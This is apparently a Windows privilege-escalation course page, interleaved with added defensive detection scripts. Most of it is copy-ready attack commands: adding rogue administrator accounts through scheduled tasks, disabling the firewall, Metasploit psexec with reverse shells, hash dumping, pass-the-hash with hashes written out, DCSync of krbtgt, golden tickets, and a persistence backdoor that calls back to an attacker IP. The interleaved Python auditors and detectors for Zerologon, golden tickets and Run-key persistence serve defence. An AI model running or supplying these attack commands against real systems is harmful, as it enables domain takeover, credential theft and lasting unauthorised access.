The Windows Privilege Escalation Mastery course is a comprehensive and hands-on training program designed for cybersecurity professionals, system administrators, penetration testers, and anyone seeking to enhance their skills in identifying and exploiting privilege escalation vulnerabilities within Windows environments. This immersive course will equip participants with in-depth knowledge and practical techniques to escalate privileges on Windows systems securely and efficiently.
Key Learning Objectives:
- Understanding Windows Privilege Models: Gain insights into Windows privilege models, user permissions, and the underlying mechanisms that govern user access rights.
- Exploiting Vulnerabilities: Learn how to identify and exploit common privilege escalation vulnerabilities in Windows, including misconfigurations, weak file permissions, insecure services, and more.
- Enumeration Techniques: Master the art of enumerating users, groups, services, and system information to identify potential privilege escalation opportunities.
- Kernel Exploits: Explore advanced techniques to escalate privileges through kernel-level exploits, understanding Windows kernel architecture, and bypassing security mechanisms.
- Post-Exploitation Strategies: Learn post-exploitation methodologies to maintain persistent access and cover tracks after privilege escalation.
Course Features:
- Expert Instructors: Learn from seasoned cybersecurity professionals with extensive experience in penetration testing and Windows security.
- Cutting-Edge Tools: Familiarize yourself with the latest tools and utilities used for Windows privilege escalation.
- Practical Tips and Best Practices: Get insider tips, tricks, and best practices to conduct privilege escalation assessments effectively and efficiently.
Privilege Escalation - Manually
The commands executed can be found here:
#Change directory to where JAWS is located
cd c:\ad
#Run from CMD:
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
#Manually search
schtasks /query /fo LIST 2>nul | findstr TaskName
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
schtasks /query /fo LIST /v > C:\Users\student1\Desktop\task.txt
#Edit the file executed by Administrator
net user /add rabakuku Password123
net localgroup administrators rabakuku /add
#Reboot
#Open cmd
shutdown /r /f
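The manual search above redirects `schtasks /query /fo LIST /v` into task.txt and then looks for a task whose action file a low-privileged user can edit. The following is an added audit helper, not part of the course, that parses that LIST output offline and flags privileged tasks whose action path sits in a directory standard users can usually write to; the task names, paths and the privileged-account list are constructed assumptions, and a real audit must still confirm the ACL of each flagged file with icacls.

```python
"""Audit `schtasks /query /fo LIST /v` output (the task.txt captured above) for
privileged tasks whose action sits where standard users can usually write.
Example added here, not part of the course; tasks, paths and the privileged
account list are constructed assumptions (confirm real ACLs with icacls)."""

USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\temp\\", "c:\\programdata\\", "c:\\windows\\temp\\")
PRIVILEGED_RUNAS = {"system", r"nt authority\system", "administrators"}

def parse_schtasks_list(text):
    """One dict per task; LIST records are separated by blank lines, keys hold no ':'."""
    tasks, current = [], {}
    for line in text.splitlines() + [""]:        # trailing "" flushes the last record
        if not line.strip():
            if current:
                tasks.append(current)
            current = {}
            continue
        key, sep, value = line.partition(":")
        if sep:
            current[key.strip()] = value.strip()
    return tasks

def action_path(action):
    """Only the executable path of a 'Task To Run' value (quotes and arguments dropped)."""
    action = action.strip()
    return action[1:].split('"', 1)[0] if action.startswith('"') else action.split(" ", 1)[0]

def is_privileged(run_as):
    name = run_as.lower()
    return name in PRIVILEGED_RUNAS or name.endswith("\\administrator")

def find_risky_tasks(text):
    """(TaskName, Run As User, Task To Run) for privileged tasks in user-writable paths."""
    risky = []
    for task in parse_schtasks_list(text):
        run_as, action = task.get("Run As User", ""), task.get("Task To Run", "")
        if is_privileged(run_as) and action_path(action).lower().startswith(USER_WRITABLE_PREFIXES):
            risky.append((task.get("TaskName", "?"), run_as, action))
    return risky

# Constructed LIST output: the first task is the risky one, the second is not.
SAMPLE_TASKS = r"""TaskName:                             \Maintenance\Cleanup
Task To Run:                          C:\Users\student1\Desktop\cleanup.bat
Run As User:                          SYSTEM

TaskName:                             \UserSync
Task To Run:                          "C:\Users\student1\sync.exe" -q
Run As User:                          student1
"""
```

Fixing a flagged task means moving the action into an admin-only directory (or tightening its ACL), not just removing the task.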
Zerologon, tracked as CVE-2020-1472, is an authentication bypass vulnerability in the Netlogon Remote Protocol (MS-NRPC), a remote procedure call (RPC) interface that Windows uses to authenticate users and computers on domain-based networks. It was designed for specific tasks such as maintaining relationships between members of domains and the domain controller (DC), or between multiple domain controllers across one or multiple domains and replicating the domain controller database.
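On a patched domain controller the exploitation attempts described above leave two kinds of log artefacts: Netlogon events 5827/5828/5829 in the System log (vulnerable secure-channel connections denied or, if enforcement mode is off, allowed), and a Security event 4742 in which a computer account's password is changed by ANONYMOUS LOGON. The following detection logic is an added example, not part of the course; the event records are constructed and the normalised field names (Log, Provider, ClientIP, SamAccountName) are assumptions about how a collector would flatten the EVTX data.

```python
"""Flag Zerologon (CVE-2020-1472) indicators in Domain Controller logs.
Example added here, not from the course. Events are constructed dicts; the
Netlogon event IDs are the ones Microsoft's patch logs, but the normalised
field names (Log, Provider, ClientIP, ...) are assumptions of the collector."""

NETLOGON_VULN_EVENTS = {
    5827: "denied vulnerable Netlogon secure channel from a machine account",
    5828: "denied vulnerable Netlogon secure channel from a trust account",
    5829: "ALLOWED vulnerable Netlogon secure channel (enforcement mode off)",
}

def zerologon_indicators(events):
    """Return (severity, description) findings, in log order."""
    findings = []
    for ev in events:
        eid, log = ev.get("EventID"), ev.get("Log")
        if log == "System" and ev.get("Provider") == "NETLOGON" and eid in NETLOGON_VULN_EVENTS:
            severity = "high" if eid == 5829 else "medium"
            findings.append((severity, f"{NETLOGON_VULN_EVENTS[eid]}: "
                             f"{ev.get('SamAccountName', '?')} from {ev.get('ClientIP', '?')}"))
        elif log == "Security" and eid == 4742:
            # A computer-account change whose subject is ANONYMOUS LOGON is the
            # artefact of the machine-password reset that the exploit performs.
            subject, target = ev.get("SubjectUserName", ""), ev.get("TargetUserName", "")
            if subject.upper() == "ANONYMOUS LOGON" and target.endswith("$"):
                findings.append(("critical", f"computer account {target} changed by ANONYMOUS LOGON"))
    return findings

# Constructed DC log excerpt: one allowed vulnerable channel, one anonymous
# machine-account change, and one benign machine-account password rotation.
SAMPLE_EVENTS = [
    {"Log": "Security", "EventID": 4624, "TargetUserName": "ANONYMOUS LOGON", "LogonType": 3},
    {"Log": "System", "Provider": "NETLOGON", "EventID": 5829, "SamAccountName": "DC01$", "ClientIP": "192.168.1.99"},
    {"Log": "Security", "EventID": 4742, "SubjectUserName": "ANONYMOUS LOGON", "TargetUserName": "DC01$"},
    {"Log": "Security", "EventID": 4742, "SubjectUserName": "WS07$", "TargetUserName": "WS07$"},
]
```

A 5829 hit means enforcement mode is still off on that DC; a 4742 hit means the machine password has already been reset and the account must be restored before the DC breaks replication.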
Local Privilege Escalation With EvilWinRM
AMSI
Antimalware Scan Interface
Windows AMSI is integrated into the following components:
PowerShell (scripts, interactive use, and dynamic code evaluation)
PowerShell ISE (Windows PowerShell-IDE)
Windows Script Host (Wscript.exe and Cscript.exe) (scripts and dynamic code evaluation)
User Account Control (UAC) (using a different type of AMSI-provider)
Office365 (JavaScript/VBA)
Office365 (Documents)
.NET Framework 4.8 (scanning of all assemblies)
Windows Management Instrumentation (WMI)
upload: local files can be auto-completed using tab key. It is not needed to put a remote_path if the local file is in the same directory as evil-winrm.rb file.
usage: upload local_path remote_path
download: it is not needed to set local_path if the remote file is in the current directory.
usage: download remote_path local_path
services: list all services. No administrator permissions needed.
User Enumeration
Get current username
echo %USERNAME% || whoami
$env:username
List user privilege
whoami /priv
whoami /groups
List all users
net user
whoami /all
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
List logon requirements; useable for bruteforcing
net accounts
Get details about a user (i.e. administrator, admin, current user)
net user administrator
net user admin
net user %USERNAME%
List all local groups
net localgroup
Get-LocalGroup | ft Name
Get details about a group (i.e. administrators)
net localgroup administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
Network Enumeration
List all network interfaces, IP, and DNS.
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
List current routing table
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
List the ARP table
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
List all current connections
netstat -ano
List firewall state and current configuration
netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config
List firewall's blocked ports
$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports
Disable firewall
netsh firewall set opmode disable
netsh advfirewall set allprofiles state off
List all network shares
net share
SNMP Configuration
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
Windows Local Privilege Escalation With Empire
sudo apt install powershell-empire
sudo powershell-empire
Listeners
help
uselistener http
info <- it will display all the options that you can tweak
Set BindIP to Kali's IP address
Set Port to any port number other than 80
execute
net user raba Password123 /add
net localgroup administrators raba /add
net localgroup "Remote Management Users" raba /add
remove old
Windows Local Privilege Escalation With Metasploit
Metasploit is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders. Point Metasploit at your target, pick an exploit, what payload to drop, and hit Enter.
Check if it is exploitable:
use exploit/windows/smb/ms17_010_psexec
set rhosts 192.168.1.53
set smbpass Password123
set smbuser student1
set smbdomain pentesting.local
set payload windows/meterpreter/reverse_tcp
run
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
use auxiliary/gather/kerberos_enumusers
sysinfo
ps
post/windows/gather/enum_ad_users
post/windows/gather/enum_domain_group_users
post/windows/gather/enum_logged_on_users
post/windows/gather/enum_ad_user_comments
post/windows/gather/enum_domain_group_users
post/windows/gather/enum_domain
post/windows/gather/enum_computers
post/windows/gather/resolve_sid.rb
run post/windows/gather/enum_ad_computers.rb
post/windows/gather/local_admin_search_enum
post/windows/gather/enum_ad_service_principal_names
run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24
ipconfig
netstat
route
#Windows Gather Enumerate Domain Admin Tokens (T
post/windows/gather/enum_tokens
post/windows/gather/enum_patches
post/windows/gather/credentials/winscp
#Windows Gather Powershell Environment Setting E
post/windows/gather/enum_powershell_env
post/windows/gather/enum_ie
post/windows/gather/bloodhound
For more:
search post/windows/gather/
use post/windows/gather/enum_shares
use post/windows/gather/enum_services
use post/windows/gather/enum_snmp
use post/windows/gather/enum_chrome
use post/windows/gather/enum_av_excluded
use post/windows/gather/enum_putty_saved_sessions
use post/windows/gather/enum_applications
use post/windows/gather/win_privs
use post/windows/gather/forensics/browser_history
for more:
search post/windows/gather/
LOCAL_EXPLOIT_SUGGESTER
run post/multi/recon/local_exploit_suggester
post/windows/gather/win_privs
post/windows/manage/add_user
set addtogroup true
set username test
set group administrators
set session 2
post/windows/manage/delete_user
search hashdump
search credential_collector
post/windows/gather/hashdump
post/windows/gather/credentials/credential_collector
meterpreter > load kiwi
meterpreter > help
Testing Credentials
crackmapexec smb 192.168.1.50 192.168.1.55 -u ippsec -p Password123!
Pass The Hash with Psexec: To perform this, all we need is the NTLM hash of a privileged user. That is exactly what we obtained earlier with mimikatz.
use exploit/windows/smb/psexec
set SMBDomain pentesting.local
set smbuser ippsec
set SMBPass e52cac67419a9a22c17ec4fe2a5374cb:2b576acbe6bcfda7294d6bd18041b8fe
set rhosts 192.168.1.55
set lport 4457
options
load kiwi
creds_msv
00000000000000000000000000000000
Check whether the user is a member of Domain Users
use post/windows/gather/enum_domain_group_users
Pass The Hash with Psexec: To perform this, all we need is the NTLM hash of a privileged user. That is exactly what we obtained earlier with mimikatz.
use exploit/windows/smb/psexec
set SMBDomain pentesting.local
set smbuser s4vitar
set SMBPass 00000000000000000000000000000000:58a478135a93ac3bf058a5ea0e8fdb71
set rhosts 192.168.1.50
set lport 4457
options
load kiwi
creds_msv
00000000000000000000000000000000
Check whether the user is a member of Domain Users
use post/windows/gather/enum_domain_group_users
use post/windows/gather/credentials/domain_hashdump
scanner/smb/impacket/secretsdump
The Metasploit framework includes an extension called incognito, which allows us to perform activities such as token stealing and manipulation. These kinds of activities matter in the privilege escalation stage of a penetration test because if we can steal the token of an administrator, for example, we can perform higher-privilege operations on the target.
use post/windows/gather/credentials/domain_hashdump
use incognito
list_tokens -u
impersonate_token PENTESTING\Administrator
From Domain Controller
meterpreter > use incognito
meterpreter > impersonate_token PENTESTING\Administrator
meterpreter > load kiwi
meterpreter > help
meterpreter > kiwi_cmd '"lsadump::dcsync /user:Administrator"'
meterpreter > kiwi_cmd '"lsadump::dcsync /user:krbtgt"'
use post/windows/escalate/golden_ticket
Golden Ticket attacks can be carried out against Active Directory domains, where access control is implemented using Kerberos tickets issued to authenticated users by a Key Distribution Service.
The attacker gains control over the domain’s Key Distribution Service account (KRBTGT account) by stealing its NTLM hash. This allows the attacker to generate Ticket Granting Tickets (TGTs) for any account in the Active Directory domain.
With valid TGTs, the attacker can request access to any resource/system on its domain from the Ticket Granting Service (TGS).
Because the attacker controls the component of the access control system that is responsible for issuing Ticket Granting Tickets (TGTs), they hold a "golden ticket" to any resource in the domain.
kerberos_ticket_list
kerberos_ticket_use /root/.msf4/loot/20210501011013_default_192.168.1.50_golden.ticket_888290.bin
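Because a golden ticket is minted off-host from the krbtgt hash, the domain controller never logs the TGT request (event 4768) that would normally precede the service-ticket requests (event 4769) made with it, and a ticket forged from the NT hash is RC4-encrypted in domains that otherwise use AES. The following heuristic detector is an added example, not part of the course; the events are constructed dicts keyed by the 4768/4769 EventData names plus a Unix Time field, and logs from every DC in the domain must be merged before it is meaningful, since the TGT may legitimately have been issued by another DC.

```python
"""Heuristics for forged-TGT (golden ticket) use in Domain Controller Security logs:
a service-ticket request (4769) with no TGT request (4768) for the same account and
client inside the TGT lifetime, or a service ticket negotiated with RC4 in a domain
where AES is the norm. Example added here, not from the course; the events are
constructed dicts keyed by the 4768/4769 EventData names plus a Unix 'Time'."""

RC4_HMAC = "0x17"            # TicketEncryptionType for RC4; AES tickets log 0x11/0x12
TGT_LIFETIME = 10 * 3600     # default domain policy: 10 hours

def account_key(ev):
    """4769 logs user@REALM while 4768 logs the bare name, so normalise both."""
    return (ev["TargetUserName"].split("@")[0].lower(), ev["IpAddress"])

def golden_ticket_indicators(events, window=TGT_LIFETIME):
    """Return (account, client_ip, reason) for each suspicious 4769.
    Logs from every DC must be merged first: a TGT may have been issued elsewhere."""
    last_tgt, findings = {}, []
    for ev in sorted(events, key=lambda e: e["Time"]):
        if ev.get("Status", "0x0") != "0x0":      # ignore failed requests
            continue
        key = account_key(ev)
        if ev["EventID"] == 4768:
            last_tgt[key] = ev["Time"]
        elif ev["EventID"] == 4769:
            issued = last_tgt.get(key)
            if issued is None or ev["Time"] - issued > window:
                findings.append((*key, "TGS request with no TGT issued to this client within the window"))
            if ev.get("TicketEncryptionType") == RC4_HMAC:
                findings.append((*key, "RC4 service ticket in an AES domain"))
    return findings

# Constructed log excerpt: alice behaves normally; 'Administrator' from .99 presents
# a TGT this DC never issued and uses RC4, as a ticket forged from the NT hash does.
SAMPLE_EVENTS = [
    {"EventID": 4768, "Time": 100, "TargetUserName": "alice", "IpAddress": "::ffff:192.168.1.20",
     "Status": "0x0", "TicketEncryptionType": "0x12"},
    {"EventID": 4769, "Time": 160, "TargetUserName": "alice@PENTESTING.LOCAL", "IpAddress": "::ffff:192.168.1.20",
     "ServiceName": "cifs/fs01", "Status": "0x0", "TicketEncryptionType": "0x12"},
    {"EventID": 4769, "Time": 400, "TargetUserName": "Administrator@PENTESTING.LOCAL",
     "IpAddress": "::ffff:192.168.1.99", "ServiceName": "cifs/dc01", "Status": "0x0", "TicketEncryptionType": "0x17"},
]
```

The only remediation once krbtgt is compromised is to reset the krbtgt password twice (with replication in between), which invalidates every outstanding forged TGT.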
After going through all the hard work of exploiting a system, it’s often a good idea to leave yourself an easier way back into the system for later use. This way, if the service you initially exploited is down or patched, you can still gain access to the system. Metasploit has a Meterpreter script, persistence.rb, that will create a Meterpreter service that will be available to you even if the remote system is rebooted.
meterpreter > run persistence -h
meterpreter > run persistence -U -i 5 -p 4458 -r 192.168.1.223
meterpreter > exit
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.223
set LPORT 4458
exploit
When a user logs in to the remote system, a Meterpreter session is opened up for us.
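The persistence script run with -U registers its dropped VBS launcher under the user's HKCU Run key so that it starts at every logon, which is exactly where a defender should look. The following check is an added example, not part of the course or of Metasploit: it runs over constructed Sysmon event 13 (registry value set) records, whose field names follow Sysmon's RegistryEvent schema, and flags Run-key values that point at a script in a Temp directory or are launched through a script host.

```python
"""Flag Run-key autoruns of the kind the Meterpreter persistence script leaves
(a VBS dropped in a Temp directory and registered under HKCU\\...\\Run).
Example added here, not part of the course; the Sysmon event 13 records are
constructed and the field names follow Sysmon's RegistryEvent schema."""
import re

RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
TEMP_SCRIPT = re.compile(r'\\Temp\\[^\\\s"]+\.(vbs|js|bat|ps1)\b', re.I)
SCRIPT_HOSTS = ("wscript", "cscript", "powershell", "mshta")

def suspicious_autoruns(events):
    """Return (key, value, reason) for Sysmon 13 value-set events on Run keys whose
    value launches a script from a Temp folder or goes through a script host."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 13 or not RUN_KEY.search(ev.get("TargetObject", "")):
            continue
        details = ev.get("Details", "")
        if TEMP_SCRIPT.search(details):
            findings.append((ev["TargetObject"], details, "autorun points at a script in a Temp directory"))
        elif details.lower().lstrip('"').startswith(SCRIPT_HOSTS):
            findings.append((ev["TargetObject"], details, "autorun launched through a script host"))
    return findings

# Constructed Sysmon records: Sysmon logs HKCU keys under HKU\<SID>. The value
# names and paths are made up; the first two are the suspicious ones.
USER_RUN = r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Run"
SAMPLE_EVENTS = [
    {"EventID": 13, "TargetObject": USER_RUN + r"\JmfOSIpx",
     "Details": r"C:\Users\student1\AppData\Local\Temp\JmfOSIpx.vbs"},
    {"EventID": 13, "TargetObject": USER_RUN + r"\Updater",
     "Details": r'wscript.exe "C:\ProgramData\u.js"'},
    {"EventID": 13, "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     "Details": r"C:\Windows\system32\SecurityHealthSystray.exe"},
    {"EventID": 12, "TargetObject": USER_RUN + r"\Created", "Details": ""},
]
```

Alerting on these two patterns also covers the reboot case the text describes, since the Run key is what survives the restart.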